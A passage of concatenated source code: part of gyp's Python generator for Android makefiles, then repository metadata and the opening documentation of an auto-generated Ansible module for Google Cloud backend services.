extra_outputs += outputs
if int(rule.get('process_outputs_as_sources', False)):
extra_sources.extend(outputs)
components = []
for component in rule['action']:
component = self.ExpandInputRoot(component, rule_source_root,
rule_source_dirname)
if '$(RULE_SOURCES)' in component:
component = component.replace('$(RULE_SOURCES)',
rule_source)
components.append(component)
command = gyp.common.EncodePOSIXShellList(components)
cd_action = 'cd $(gyp_local_path)/%s; ' % self.path
command = cd_action + command
if dirs:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
# We set up a rule to build the first output, and then set up
# a rule for each additional output to depend on the first.
outputs = map(self.LocalPathify, outputs)
main_output = outputs[0]
self.WriteLn('%s: gyp_local_path := $(LOCAL_PATH)' % main_output)
self.WriteLn('%s: gyp_var_prefix := $(GYP_VAR_PREFIX)' % main_output)
self.WriteLn('%s: gyp_intermediate_dir := '
'$(abspath $(gyp_intermediate_dir))' % main_output)
self.WriteLn('%s: gyp_shared_intermediate_dir := '
'$(abspath $(gyp_shared_intermediate_dir))' % main_output)
# See explanation in WriteActions.
self.WriteLn('%s: export PATH := '
'$(subst $(ANDROID_BUILD_PATHS),,$(PATH))' % main_output)
main_output_deps = self.LocalPathify(rule_source)
if inputs:
main_output_deps += ' '
main_output_deps += ' '.join([self.LocalPathify(f) for f in inputs])
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES)' %
(main_output, main_output_deps))
self.WriteLn('\t%s\n' % command)
for output in outputs[1:]:
# Make each output depend on the main output, with an empty command
# to force make to notice that the mtime has changed.
self.WriteLn('%s: %s ;' % (output, main_output))
self.WriteLn()
self.WriteLn()
def WriteCopies(self, copies, extra_outputs):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
"""
self.WriteLn('### Generated for copy rule.')
variable = make.StringToMakefileVariable(self.relative_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# The Android build system does not allow generation of files into the
# source tree. The destination should start with a variable, which will
# typically be $(gyp_intermediate_dir) or
# $(gyp_shared_intermediate_dir). Note that we can't use an assertion
# because some of the gyp tests depend on this.
if not copy['destination'].startswith('$'):
print ('WARNING: Copy rule for target %s writes output to '
'local path %s' % (self.target, copy['destination']))
# LocalPathify() calls normpath, stripping trailing slashes.
path = Sourceify(self.LocalPathify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.LocalPathify(os.path.join(copy['destination'],
filename)))
self.WriteLn('%s: %s $(GYP_TARGET_DEPENDENCIES) | $(ACP)' %
(output, path))
self.WriteLn('\t@echo Copying: $@')
self.WriteLn('\t$(hide) mkdir -p $(dir $@)')
self.WriteLn('\t$(hide) $(ACP) -rpf $< $@')
self.WriteLn()
outputs.append(output)
self.WriteLn('%s = %s' % (variable,
' '.join(map(make.QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteSourceFlags(self, spec, configs):
"""Write out the flags and include paths used to compile source files for
the current target.
Args:
spec, configs: input from gyp.
"""
for configname, config in sorted(configs.iteritems()):
extracted_includes = []
self.WriteLn('\n# Flags passed to both C and C++ files.')
cflags, includes_from_cflags = self.ExtractIncludesFromCFlags(
config.get('cflags', []) + config.get('cflags_c', []))
extracted_includes.extend(includes_from_cflags)
self.WriteList(cflags, 'MY_CFLAGS_%s' % configname)
self.WriteList(config.get('defines'), 'MY_DEFS_%s' % configname,
prefix='-D', quoter=make.EscapeCppDefine)
self.WriteLn('\n# Include paths placed before CFLAGS/CPPFLAGS')
includes = list(config.get('include_dirs', []))
includes.extend(extracted_includes)
includes = map(Sourceify, map(self.LocalPathify, includes))
includes = self.NormalizeIncludePaths(includes)
self.WriteList(includes, 'LOCAL_C_INCLUDES_%s' % configname)
self.WriteLn('\n# Flags passed to only C++ (and not C) files.')
self.WriteList(config.get('cflags_cc'), 'LOCAL_CPPFLAGS_%s' % configname)
self.WriteLn('\nLOCAL_CFLAGS := $(MY_CFLAGS_$(GYP_CONFIGURATION)) '
'$(MY_DEFS_$(GYP_CONFIGURATION))')
# Undefine ANDROID for host modules
# TODO: the source code should not use macro ANDROID to tell if it's host
# or target module.
if self.toolset == 'host':
self.WriteLn('# Undefine ANDROID for host modules')
self.WriteLn('LOCAL_CFLAGS += -UANDROID')
self.WriteLn('LOCAL_C_INCLUDES := $(GYP_COPIED_SOURCE_ORIGIN_DIRS) '
'$(LOCAL_C_INCLUDES_$(GYP_CONFIGURATION))')
self.WriteLn('LOCAL_CPPFLAGS := $(LOCAL_CPPFLAGS_$(GYP_CONFIGURATION))')
# Android uses separate flags for assembly file invocations, but gyp expects
# the same CFLAGS to be applied:
self.WriteLn('LOCAL_ASFLAGS := $(LOCAL_CFLAGS)')
def WriteSources(self, spec, configs, extra_sources):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
We need to handle shared_intermediate directory source files as
a special case by copying them to the intermediate directory and
treating them as a genereated sources. Otherwise the Android build
rules won't pick them up.
Args:
spec, configs: input from gyp.
extra_sources: Sources generated from Actions or Rules.
"""
sources = filter(make.Compilable, spec.get('sources', []))
generated_not_sources = [x for x in extra_sources if not make.Compilable(x)]
extra_sources = filter(make.Compilable, extra_sources)
# Determine and output the C++ extension used by these sources.
# We simply find the first C++ file and use that extension.
all_sources = sources + extra_sources
local_cpp_extension = '.cpp'
for source in all_sources:
(root, ext) = os.path.splitext(source)
if IsCPPExtension(ext):
local_cpp_extension = ext
break
if local_cpp_extension != '.cpp':
self.WriteLn('LOCAL_CPP_EXTENSION := %s' % local_cpp_extension)
# We need to move any non-generated sources that are coming from the
# shared intermediate directory out of LOCAL_SRC_FILES and put them
# into LOCAL_GENERATED_SOURCES. We also need to move over any C++ files
# that don't match our local_cpp_extension, since Android will only
# generate Makefile rules for a single LOCAL_CPP_EXTENSION.
local_files = []
for source in sources:
(root, ext) = os.path.splitext(source)
if '$(gyp_shared_intermediate_dir)' in source:
extra_sources.append(source)
elif '$(gyp_intermediate_dir)' in source:
extra_sources.append(source)
elif IsCPPExtension(ext) and ext != local_cpp_extension:
extra_sources.append(source)
else:
local_files.append(os.path.normpath(os.path.join(self.path, source)))
# For any generated source, if it is coming from the shared intermediate
# directory then we add a Make rule to copy them to the local intermediate
# directory first. This is because the Android LOCAL_GENERATED_SOURCES
# must be in the local module intermediate directory for the compile rules
# to work properly. If the file has the wrong C++ extension, then we add
# a rule to copy that to intermediates and use the new version.
final_generated_sources = []
# If a source file gets copied, we still need to add the orginal source
# directory as header search path, for GCC searches headers in the
# directory that contains the source file by default.
origin_src_dirs = []
for source in extra_sources:
local_file = source
if not '$(gyp_intermediate_dir)/' in local_file:
basename = os.path.basename(local_file)
local_file = '$(gyp_intermediate_dir)/' + basename
(root, ext) = os.path.splitext(local_file)
if IsCPPExtension(ext) and ext != local_cpp_extension:
local_file = root + local_cpp_extension
if local_file != source:
self.WriteLn('%s: %s' % (local_file, self.LocalPathify(source)))
self.WriteLn('\tmkdir -p $(@D); cp $< $@')
origin_src_dirs.append(os.path.dirname(source))
final_generated_sources.append(local_file)
# We add back in all of the non-compilable stuff to make sure that the
# make rules have dependencies on them.
final_generated_sources.extend(generated_not_sources)
self.WriteList(final_generated_sources, 'LOCAL_GENERATED_SOURCES')
origin_src_dirs = gyp.common.uniquer(origin_src_dirs)
origin_src_dirs = map(Sourceify, map(self.LocalPathify, origin_src_dirs))
self.WriteList(origin_src_dirs, 'GYP_COPIED_SOURCE_ORIGIN_DIRS')
self.WriteList(local_files, 'LOCAL_SRC_FILES')
# Write out the flags used to compile the source; this must be done last
# so that GYP_COPIED_SOURCE_ORIGIN_DIRS can be used as an include path.
self.WriteSourceFlags(spec, configs)
def ComputeAndroidModule(self, spec):
"""Return the Android module name used for a gyp spec.
We use the complete qualified target name to avoid collisions between
duplicate targets in different directories. We also add a suffix to
distinguish gyp-generated module names.
"""
if int(spec.get('android_unmangled_name', 0)):
assert self.type != 'shared_library' or self.target.startswith('lib')
return self.target
if self.type == 'shared_library':
# For reasons of convention, the Android build system requires that all
# shared library modules are named 'libfoo' when generating -l flags.
prefix = 'lib_'
else:
prefix = ''
if spec['toolset'] == 'host':
suffix = '_$(TARGET_$(GYP_VAR_PREFIX)ARCH)_host_gyp'
else:
suffix = '_gyp'
if self.path:
middle = make.StringToMakefileVariable('%s_%s' % (self.path, self.target))
else:
middle = make.StringToMakefileVariable(self.target)
return ''.join([prefix, middle, suffix])
def ComputeOutputParts(self, spec):
"""Return the 'output basename' of a gyp spec, split into filename + ext.
Android libraries must be named the same thing as their module name,
otherwise the linker can't find them, so product_name and so on must be
ignored if we are building a library, and the "lib" prepending is
not done for Android.
"""
assert self.type != 'loadable_module' # TODO: not supported?
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
target = self.ComputeAndroidModule(spec)
target_ext = '.a'
elif self.type == 'shared_library':
target = self.ComputeAndroidModule(spec)
target_ext = '.so'
elif self.type == 'none':
target_ext = '.stamp'
elif self.type != 'executable':
print ("ERROR: What output file should be generated?",
"type", self.type, "target", target)
if self.type != 'static_library' and self.type != 'shared_library':
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
target_stem = target_prefix + target
return (target_stem, target_ext)
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
return ''.join(self.ComputeOutputParts(spec))
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
if self.type == 'executable':
# We install host executables into shared_intermediate_dir so they can be
# run by gyp rules that refer to PRODUCT_DIR.
path = '$(gyp_shared_intermediate_dir)'
elif self.type == 'shared_library':
if self.toolset == 'host':
path = '$($(GYP_HOST_VAR_PREFIX)HOST_OUT_INTERMEDIATE_LIBRARIES)'
else:
path = '$($(GYP_VAR_PREFIX)TARGET_OUT_INTERMEDIATE_LIBRARIES)'
else:
# Other targets just get built into their intermediate dir.
if self.toolset == 'host':
path = ('$(call intermediates-dir-for,%s,%s,true,,'
'$(GYP_HOST_VAR_PREFIX))' % (self.android_class,
self.android_module))
else:
path = ('$(call intermediates-dir-for,%s,%s,,,$(GYP_VAR_PREFIX))'
% (self.android_class, self.android_module))
assert spec.get('product_dir') is None # TODO: not supported?
return os.path.join(path, self.ComputeOutputBasename(spec))
def NormalizeIncludePaths(self, include_paths):
""" Normalize include_paths.
Convert absolute paths to relative to the Android top directory.
Args:
include_paths: A list of unprocessed include paths.
Returns:
A list of normalized include paths.
"""
normalized = []
for path in include_paths:
if path[0] == '/':
path = gyp.common.RelativePath(path, self.android_top_dir)
normalized.append(path)
return normalized
def ExtractIncludesFromCFlags(self, cflags):
"""Extract includes "-I..." out from cflags
Args:
cflags: A list of compiler flags, which may be mixed with "-I.."
Returns:
A tuple of lists: (clean_clfags, include_paths). "-I.." is trimmed.
"""
clean_cflags = []
include_paths = []
for flag in cflags:
if flag.startswith('-I'):
include_paths.append(flag[2:])
else:
clean_cflags.append(flag)
return (clean_cflags, include_paths)
def FilterLibraries(self, libraries):
"""Filter the 'libraries' key to separate things that shouldn't be ldflags.
Library entries that look like filenames should be converted to android
module names instead of being passed to the linker as flags.
Args:
libraries: the value of spec.get('libraries')
Returns:
A tuple (static_lib_modules, dynamic_lib_modules, ldflags)
"""
static_lib_modules = []
dynamic_lib_modules = []
ldflags = []
for libs in libraries:
# Libs can have multiple words.
for lib in libs.split():
# Filter the system libraries, which are added by default by the Android
# build system.
if (lib == '-lc' or lib == '-lstdc++' or lib == '-lm' or
lib.endswith('libgcc.a')):
continue
match = re.search(r'([^/]+)\.a$', lib)
if match:
static_lib_modules.append(match.group(1))
continue
match = re.search(r'([^/]+)\.so$', lib)
if match:
dynamic_lib_modules.append(match.group(1))
continue
if lib.startswith('-l'):
ldflags.append(lib)
return (static_lib_modules, dynamic_lib_modules, ldflags)
def ComputeDeps(self, spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
return (gyp.common.uniquer(deps), gyp.common.uniquer(link_deps))
def WriteTargetFlags(self, spec, configs, link_deps):
"""Write Makefile code to specify the link flags and library dependencies.
spec, configs: input from gyp.
link_deps: link dependency list; see ComputeDeps()
"""
# Libraries (i.e. -lfoo)
# These must be included even for static libraries as some of them provide
# implicit include paths through the build system.
libraries = gyp.common.uniquer(spec.get('libraries', []))
static_libs, dynamic_libs, ldflags_libs = self.FilterLibraries(libraries)
if self.type != 'static_library':
for configname, config in sorted(configs.iteritems()):
ldflags = list(config.get('ldflags', []))
self.WriteLn('')
self.WriteList(ldflags, 'LOCAL_LDFLAGS_%s' % configname)
self.WriteList(ldflags_libs, 'LOCAL_GYP_LIBS')
self.WriteLn('LOCAL_LDFLAGS := $(LOCAL_LDFLAGS_$(GYP_CONFIGURATION)) '
'$(LOCAL_GYP_LIBS)')
# Link dependencies (i.e. other gyp targets this target depends on)
# These need not be included for static libraries as within the gyp build
# we do not use the implicit include path mechanism.
if self.type != 'static_library':
static_link_deps = [x[1] for x in link_deps if x[0] == 'static']
shared_link_deps = [x[1] for x in link_deps if x[0] == 'shared']
else:
static_link_deps = []
shared_link_deps = []
# Only write the lists if they are non-empty.
if static_libs or static_link_deps:
self.WriteLn('')
self.WriteList(static_libs + static_link_deps,
'LOCAL_STATIC_LIBRARIES')
self.WriteLn('# Enable grouping to fix circular references')
self.WriteLn('LOCAL_GROUP_STATIC_LIBRARIES := true')
if dynamic_libs or shared_link_deps:
self.WriteLn('')
self.WriteList(dynamic_libs + shared_link_deps,
'LOCAL_SHARED_LIBRARIES')
def WriteTarget(self, spec, configs, deps, link_deps, part_of_all,
write_alias_target):
"""Write Makefile code to produce the final target of the gyp spec.
spec, configs: input from gyp.
deps, link_deps: dependency lists; see ComputeDeps()
part_of_all: flag indicating this target is part of 'all'
write_alias_target: flag indicating whether to create short aliases for this
target
"""
self.WriteLn('### Rules for final target.')
if self.type != 'none':
self.WriteTargetFlags(spec, configs, link_deps)
settings = spec.get('aosp_build_settings', {})
if settings:
self.WriteLn('### Set directly by aosp_build_settings.')
for k, v in settings.iteritems():
if isinstance(v, list):
self.WriteList(v, k)
else:
self.WriteLn('%s := %s' % (k, make.QuoteIfNecessary(v)))
self.WriteLn('')
# Add to the set of targets which represent the gyp 'all' target. We use the
# name 'gyp_all_modules' as the Android build system doesn't allow the use
# of the Make target 'all' and because 'all_modules' is the equivalent of
# the Make target 'all' on Android.
if part_of_all and write_alias_target:
self.WriteLn('# Add target alias to "gyp_all_modules" target.')
self.WriteLn('.PHONY: gyp_all_modules')
self.WriteLn('gyp_all_modules: %s' % self.android_module)
self.WriteLn('')
# Add an alias from the gyp target name to the Android module name. This
# simplifies manual builds of the target, and is required by the test
# framework.
if self.target != self.android_module and write_alias_target:
self.WriteLn('# Alias gyp target name.')
self.WriteLn('.PHONY: %s' % self.target)
self.WriteLn('%s: %s' % (self.target, self.android_module))
self.WriteLn('')
# Add the command to trigger build of the target type depending
# on the toolset. Ex: BUILD_STATIC_LIBRARY vs. BUILD_HOST_STATIC_LIBRARY
# NOTE: This has to come last!
modifier = ''
if self.toolset == 'host':
modifier = 'HOST_'
if self.type == 'static_library':
self.WriteLn('include $(BUILD_%sSTATIC_LIBRARY)' % modifier)
elif self.type == 'shared_library':
self.WriteLn('LOCAL_PRELINK_MODULE := false')
self.WriteLn('include $(BUILD_%sSHARED_LIBRARY)' % modifier)
elif self.type == 'executable':
self.WriteLn('LOCAL_CXX_STL := libc++_static')
# Executables are for build and test purposes only, so they're installed
# to a directory that doesn't get included in the system image.
self.WriteLn('LOCAL_MODULE_PATH := $(gyp_shared_intermediate_dir)')
self.WriteLn('include $(BUILD_%sEXECUTABLE)' % modifier)
else:
self.WriteLn('LOCAL_MODULE_PATH := $(PRODUCT_OUT)/gyp_stamp')
self.WriteLn('LOCAL_UNINSTALLABLE_MODULE := true')
if self.toolset == 'target':
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX := $(GYP_VAR_PREFIX)')
else:
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX := $(GYP_HOST_VAR_PREFIX)')
self.WriteLn()
self.WriteLn('include $(BUILD_SYSTEM)/base_rules.mk')
self.WriteLn()
self.WriteLn('$(LOCAL_BUILT_MODULE): $(LOCAL_ADDITIONAL_DEPENDENCIES)')
self.WriteLn('\t$(hide) echo "Gyp timestamp: $@"')
self.WriteLn('\t$(hide) mkdir -p $(dir $@)')
self.WriteLn('\t$(hide) touch $@')
self.WriteLn()
self.WriteLn('LOCAL_2ND_ARCH_VAR_PREFIX :=')
def WriteList(self, value_list, variable=None, prefix='',
quoter=make.QuoteIfNecessary, local_pathify=False):
"""Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
if local_pathify:
value_list = [self.LocalPathify(l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def LocalPathify(self, path):
"""Convert a subdirectory-relative path into a normalized path which starts
with the make variable $(LOCAL_PATH) (i.e. the top of the project tree).
Absolute paths, or paths that contain variables, are just normalized."""
if '$(' in path or os.path.isabs(path):
# path is not a file in the project tree in this case, but calling
# normpath is still important for trimming trailing slashes.
return os.path.normpath(path)
local_path = os.path.join('$(LOCAL_PATH)', self.path, path)
local_path = os.path.normpath(local_path)
# Check that normalizing the path didn't ../ itself out of $(LOCAL_PATH)
# - i.e. that the resulting path is still inside the project tree. The
# path may legitimately have ended up containing just $(LOCAL_PATH), though,
# so we don't look for a slash.
assert local_path.startswith('$(LOCAL_PATH)'), (
'Path %s attempts to escape from gyp path %s !)' % (path, self.path))
return local_path
def ExpandInputRoot(self, template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return os.path.normpath(path)
def PerformBuild(data, configurations, params):
# The android backend only supports the default configuration.
options = params['options']
makefile = os.path.abspath(os.path.join(options.toplevel_dir,
'GypAndroid.mk'))
env = dict(os.environ)
env['ONE_SHOT_MAKEFILE'] = makefile
arguments = ['make', '-C', os.environ['ANDROID_BUILD_TOP'], 'gyp_all_modules']
print 'Building: %s' % arguments
subprocess.check_call(arguments, env=env)
def GenerateOutput(target_list, target_dicts, data, params):
options = params['options']
generator_flags = params.get('generator_flags', {})
builddir_name = generator_flags.get('output_dir', 'out')
limit_to_target_all = generator_flags.get('limit_to_target_all', False)
write_alias_targets = generator_flags.get('write_alias_targets', True)
sdk_version = generator_flags.get('aosp_sdk_version', 0)
android_top_dir = os.environ.get('ANDROID_BUILD_TOP')
assert android_top_dir, '$ANDROID_BUILD_TOP not set; you need to run lunch.'
def CalculateMakefilePath(build_file, base_name):
"""Determine where to write a Makefile for a given gyp file."""
# Paths in gyp files are relative to the .gyp file, but we want
# paths relative to the source root for the master makefile. Grab
# the path of the .gyp file as the base to relativize against.
# E.g. "foo/bar" when we're constructing targets for "foo/bar/baz.gyp".
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.depth)
# We write the file in the base_path directory.
output_file = os.path.join(options.depth, base_path, base_name)
assert not options.generator_output, (
'The Android backend does not support options.generator_output.')
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.toplevel_dir)
return base_path, output_file
# TODO: search for the first non-'Default' target. This can go
# away when we add verification that all targets have the
# necessary configurations.
default_configuration = None
toolsets = set([target_dicts[target]['toolset'] for target in target_list])
for target in target_list:
spec = target_dicts[target]
if spec['default_configuration'] != 'Default':
default_configuration = spec['default_configuration']
break
if not default_configuration:
default_configuration = 'Default'
srcdir = '.'
makefile_name = 'GypAndroid' + options.suffix + '.mk'
makefile_path = os.path.join(options.toplevel_dir, makefile_name)
assert not options.generator_output, (
'The Android backend does not support options.generator_output.')
gyp.common.EnsureDirExists(makefile_path)
root_makefile = open(makefile_path, 'w')
root_makefile.write(header)
# We set LOCAL_PATH just once, here, to the top of the project tree. This
# allows all the other paths we use to be relative to the Android.mk file,
# as the Android build system expects.
root_makefile.write('\nLOCAL_PATH := $(call my-dir)\n')
# Find the list of targets that derive from the gyp file(s) being built.
needed_targets = set()
for build_file in params['build_files']:
for target in gyp.common.AllTargets(target_list, target_dicts, build_file):
needed_targets.add(target)
build_files = set()
include_list = set()
android_modules = {}
for qualified_target in target_list:
build_file, target, toolset = gyp.common.ParseQualifiedTarget(
qualified_target)
relative_build_file = gyp.common.RelativePath(build_file,
options.toplevel_dir)
build_files.add(relative_build_file)
included_files = data[build_file]['included_files']
for included_file in included_files:
# The included_files entries are relative to the dir of the build file
# that included them, so we have to undo that and then make them relative
# to the root dir.
relative_include_file = gyp.common.RelativePath(
gyp.common.UnrelativePath(included_file, build_file),
options.toplevel_dir)
abs_include_file = os.path.abspath(relative_include_file)
# If the include file is from the ~/.gyp dir, we should use absolute path
# so that relocating the src dir doesn't break the path.
if (params['home_dot_gyp'] and
abs_include_file.startswith(params['home_dot_gyp'])):
build_files.add(abs_include_file)
else:
build_files.add(relative_include_file)
base_path, output_file = CalculateMakefilePath(build_file,
target + '.' + toolset + options.suffix + '.mk')
spec = target_dicts[qualified_target]
configs = spec['configurations']
part_of_all = qualified_target in needed_targets
if limit_to_target_all and not part_of_all:
continue
relative_target = gyp.common.QualifiedTarget(relative_build_file, target,
toolset)
writer = AndroidMkWriter(android_top_dir)
android_module = writer.Write(qualified_target, relative_target, base_path,
output_file, spec, configs,
part_of_all=part_of_all,
write_alias_target=write_alias_targets,
sdk_version=sdk_version)
if android_module in android_modules:
print ('ERROR: Android module names must be unique. The following '
'targets both generate Android module name %s.\n %s\n %s' %
(android_module, android_modules[android_module],
qualified_target))
return
android_modules[android_module] = qualified_target
# Our root_makefile lives at the source root. Compute the relative path
# from there to the output_file for including.
mkfile_rel_path = gyp.common.RelativePath(output_file,
os.path.dirname(makefile_path))
include_list.add(mkfile_rel_path)
root_makefile.write('GYP_CONFIGURATION ?= %s\n' % default_configuration)
root_makefile.write('GYP_VAR_PREFIX ?=\n')
root_makefile.write('GYP_HOST_VAR_PREFIX ?=\n')
root_makefile.write('GYP_HOST_MULTILIB ?= first\n')
# Write out the sorted list of includes.
root_makefile.write('\n')
for include_file in sorted(include_list):
root_makefile.write('include $(LOCAL_PATH)/' + include_file + '\n')
root_makefile.write('\n')
if write_alias_targets:
root_makefile.write(ALL_MODULES_FOOTER)
root_makefile.close()
|
mit
|
fxfitz/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_backend_service.py
|
14
|
36795
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ["preview"],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_backend_service
description:
- Creates a BackendService resource in the specified project using the data included
in the request.
short_description: Creates a GCP BackendService
version_added: 2.6
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices: ['present', 'absent']
default: 'present'
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set to
0, the cookie is non-persistent and lasts only until the end of the browser session
(or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
backends:
description:
- The list of backends that serve this BackendService.
required: false
suboptions:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION. Valid
values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- This cannot be used for internal load balancing.
required: false
choices: ['UTILIZATION', 'RATE', 'CONNECTION']
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
- This cannot be used for internal load balancing.
required: false
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
required: false
group:
description:
- A reference to InstanceGroup resource.
required: false
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with either
CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
required: false
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either CONNECTION
or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
required: false
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required if RATE
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
required: false
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle. This
is used to calculate the capacity of the group. Can be used in either balancing
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
required: false
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization target
for the group. The default is 0.8. Valid range is [0.0, 1.0].
- This cannot be used for internal load balancing.
required: false
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
required: false
suboptions:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
required: false
suboptions:
include_host:
description:
- If true requests to different hosts will be cached separately.
required: false
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
required: false
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according to query_string_whitelist
and query_string_blacklist. If neither is set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
required: false
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
connection_draining:
description:
- Settings for connection draining.
required: false
suboptions:
draining_timeout_sec:
description:
- Time for which instance will be drained (not accept new connections, but still work
to finish started).
required: false
description:
description:
- An optional description of this resource.
required: false
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
type: bool
health_checks:
description:
- The list of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified instead.
required: false
name:
description:
- Name of the resource. Provided by the client when the resource is created. The name
must be 1-63 characters long, and comply with RFC1035. Specifically, the name must
be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following characters
must be a dash, lowercase letter, or digit, except the last character, which cannot
be a dash.
required: false
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- Possible values are HTTP, HTTPS, TCP, and SSL. The default is HTTP.
- For internal load balancing, the possible values are TCP and UDP, and the default
is TCP.
required: false
choices: ['HTTP', 'HTTPS', 'TCP', 'SSL']
region:
description:
- A reference to Region resource.
required: false
session_affinity:
description:
- Type of session affinity to use. The default is NONE.
- When the load balancing scheme is EXTERNAL, can be NONE, CLIENT_IP, or GENERATED_COOKIE.
- When the load balancing scheme is INTERNAL, can be NONE, CLIENT_IP, CLIENT_IP_PROTO,
or CLIENT_IP_PORT_PROTO.
- When the protocol is UDP, this field is not used.
required: false
choices: ['NONE', 'CLIENT_IP', 'GENERATED_COOKIE', 'CLIENT_IP_PROTO', 'CLIENT_IP_PORT_PROTO']
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
required: false
aliases: [timeout_seconds]
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create a instance group
gcp_compute_instance_group:
name: 'instancegroup-backendservice'
zone: 'us-central1-a'
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
scopes:
- https://www.googleapis.com/auth/compute
state: present
register: instancegroup
- name: create a http health check
gcp_compute_http_health_check:
name: 'httphealthcheck-backendservice'
